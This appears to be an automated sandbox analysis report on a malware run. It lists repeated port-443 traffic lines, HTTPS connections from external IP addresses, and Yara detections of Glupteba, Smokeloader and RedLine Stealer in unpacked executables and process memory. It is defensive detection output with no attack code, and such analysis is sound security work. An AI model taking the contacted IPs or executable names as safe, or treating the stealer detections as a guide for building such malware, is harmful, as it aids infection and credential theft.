                  Source: unknownNetwork traffic detected: HTTP traffic on port 55560 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55130 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55619 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54187
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51478 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54186
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54185
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55620 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55643 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53653
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52684
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52685
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53652
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53656
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53655
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55637 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55602 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51481
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54653 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52500 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53008 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55605
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55606
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55607
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55608
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55601
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55602
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55603
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55604
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55636 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52495 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55603 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53550
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55588 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53009 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55582 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55614 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55427 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55617
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55618
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55619
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55599 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55613
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55614
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55631 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54186 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54096
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55571 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55608 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52374 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55625 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52515
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52515 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55426 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54651 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54187 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55586
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55588
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52493 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55589
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55638 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55593 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55593
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55570 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55590
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55591
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55592
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55609 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55598
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55599
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54118 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55587 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53652 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51964 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55644 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55581 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55598 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55632 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55626 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54652 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55250
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55569 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53653 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55586 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55592 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55604 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55575 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55250 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55621 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51515 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55640 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55429
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55425
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51189
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55426
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55427
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55428
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53008
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55423
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55605 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51481 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55597 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55574 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51515
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55425 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55580 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51487 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55419 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54650 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55554
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55560
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55562
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55382 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55623 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52513 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55568
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55569
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52382 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55430 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55562 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55617 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55571
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55572
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52498 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55573
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55574
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55591 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55570
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51185 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55622 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55645 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52377 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55639 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55575
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55568 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55582
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55583
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55413 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55584
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51394 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55580
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55581
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownHTTPS traffic detected: 140.82.112.4:443 -> 192.168.2.5:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51394 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.100.78.158:443 -> 192.168.2.5:51964 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53550 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.54.158:443 -> 192.168.2.5:55130 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.20.68.143:443 -> 192.168.2.5:55554 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.169.89:443 -> 192.168.2.5:55562 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.5:55560 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55569 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.200.219:443 -> 192.168.2.5:55570 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55573 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.178.183:443 -> 192.168.2.5:55574 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:55568 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.5:55575 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55572 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.142:443 -> 192.168.2.5:55571 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55580 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.167.110.211:443 -> 192.168.2.5:55581 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55584 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.177.133:443 -> 192.168.2.5:55583 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.234.57:443 -> 192.168.2.5:55582 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55587 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.63.71:443 -> 192.168.2.5:55586 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.168.159:443 -> 192.168.2.5:55617 version: TLS 1.2
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040710B GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040710B

                  E-Banking Fraud

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                  Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
